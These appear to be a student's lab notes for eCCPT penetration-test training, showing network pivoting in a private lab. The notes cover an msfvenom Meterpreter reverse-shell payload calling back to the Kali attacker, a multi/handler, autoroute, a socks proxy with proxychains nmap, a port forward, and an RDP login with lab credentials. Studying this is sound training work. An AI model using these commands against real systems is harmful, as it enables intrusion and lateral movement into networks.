Thanks for sharing this! useful for my eCCPT

Kali Attack Box 192.168.56.7 Ubuntu 192.168.56.19 10.0.3.5 Windows Server 12 10.0.3.4 From Kali Box msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=192.168.56.7 -f elf -o job LPORT=8080 chmod +x job ssh ubuntu@192.168.56.19 ifconfig ---------------on Kali open another terminal and start up a multi handler msfconsole use exploit/multi/handler set lhost 0.0.0.0 set lport 8080 set payload linux/x64/meterpreter/reverse_tcp run --------------Copy the Payload to Ubuntu (ensure you are running this from the folder with the payload on your kali box) --------------------------------From Kali box run this scp job ubuntu@192.168.56.19:~/ ----------------------------------------------------- From ubuntu ssh session run this chmod +x job ==============================From Kali box meterpreter session check the interfaces run a ping sweep of the path you want to pivot to to enumerate systems on it run post/multi/gather/ping_sweep RHOSTS=10.0.3.0/24 we found 10.0.3.4 is a host on the network (target aquired) wait for the traps to show/errors and such show map to classroom background the session in meterpreter - example how we are going to use the ubuntu box as a proxy in a way next we will set up a socks proxy using msfconsole use auxiliary/server/socks_proxy set SRVPORT 9050 set SRVHOST 0.0.0.0 set version 4a run backgound (note it will already be running in the background) check your jobs ================change your /etc/proxychains/config sudo nano /etc/proxychains4.conf (optional) ####set up post/multi/manage/autoroute ####set SESSION 1 ####set SUBNET 10.0.3.0/24 ####run ####backgound ####(note you could also run routes using "run autoroute -s 10.0.3.0/24" in the meterpreter session) ----------check your autoroutes in meterpreter sessions -i (use the session) sessions -i 1 run autoroute -p run autoroute -s 10.0.3.0/24 run autoroute -p =======use proxy chains to route nmap traffic proxychains nmap 10.0.3.4 -p3389 -sT -v -Pn ================explain the Windows Server to class open a new terminal an run this from kali proxychains nmap 10.0.3.4 -p3389 -sT -v -Pn noticed that windows has port 3389 open ================From Meterpreter add a port forward only traffic that is sent to local host 3300 is sent to 3389 portfwd add -l 3300 -p 3389 -r 10.0.3.4 ===========now sent an xfreerdp session to the Windows Host =======our meterpreter session is doing all the routing in combination with proxy chains =======we can enter the command below from the Kali box to get RDP on Windows =======================================================(didn't work for me) xfreerdp /v:localhost:3300 /u:administrator /p:Passw0rd (worked)rdesktop -u administrator -p Passw0rd localhost:3300